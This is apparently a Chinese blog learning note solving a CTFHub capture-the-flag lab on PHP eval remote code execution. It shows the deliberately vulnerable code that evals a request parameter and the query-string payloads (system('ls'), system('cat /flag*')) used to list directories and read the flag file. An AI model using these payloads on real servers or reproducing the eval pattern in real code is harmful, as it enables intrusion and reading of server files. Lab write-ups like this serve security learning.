CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
峥嵘life14 小时前
Android 蓝牙设备连接广播详解-2026
android·python·学习
楼田莉子14 小时前
Docker学习:Docker介绍及其架构介绍
运维·后端·学习·docker·容器·架构
星夜夏空9914 小时前
FreeRTOS学习(7)——任务列表
java·前端·学习
不羁的木木14 小时前
Form Kit(卡片开发服务)学习笔记01-核心概念与架构设计
笔记·学习·harmonyos
Mikowoo00714 小时前
神经网络 替代 线性模型_进行模型学习
人工智能·神经网络·学习
不羁的木木14 小时前
ArkWeb实战学习笔记01-核心概念与架构设计
笔记·学习·harmonyos
网络与设备以及操作系统学习使用者16 小时前
零信任架构落地实践详解
运维·网络·学习·架构
吃好睡好便好16 小时前
说说眼睛的日常保健
学习·生活
_李小白16 小时前
【android opencv学习笔记】Day 29: 滤波算法之Sobel 边缘检测
android·opencv·学习
Engineer邓祥浩17 小时前
宏观认知(3):AI战略与社会影响——吴恩达《AI for Everyone》Week3学习笔记
人工智能·笔记·学习
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04DeepSeek V4 + Claude Code thinking mode 400 错误修复方案05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09API Key 登录 Codex 也能用插件了,还支持会话删除和导出10CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)